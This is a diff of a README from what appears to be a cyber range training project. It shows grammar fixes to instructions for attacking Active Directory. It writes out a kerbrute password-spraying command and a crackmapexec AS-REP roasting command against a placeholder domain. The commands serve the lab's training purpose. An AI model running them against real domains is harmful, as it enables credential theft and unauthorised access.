2dukes/Cyber-Range-Framework/project/ad/README.md

 pip install -r requirements.txt
 ```

-Run (where `users.txt` holds some User Accounts + Service Accounts) gives us matches between AD Users and passwords like *CrackMapExec* but it also warns for the fact that an account does not have pre-authentication enabled.
+Run (where `users.txt` holds some User Accounts + Service Accounts) gives us matches between AD Users and passwords like *CrackMapExec*, but it also warns of the fact that an account does not have pre-authentication enabled.
 It also saves TGT tickets for the targeted users in case a password is found.

 `python3 kerbrute.py -domain xyz.com -users users.txt -passwords passwords.txt -outputfile domain_passwords.txt`

-Using CME we can also find accounts with pre-authentication disabled:
+Using CME, we can also find accounts with pre-authentication disabled:

 `crackmapexec ldap dc01.xyz.com -u users.txt -p '' --asreproast out.txt`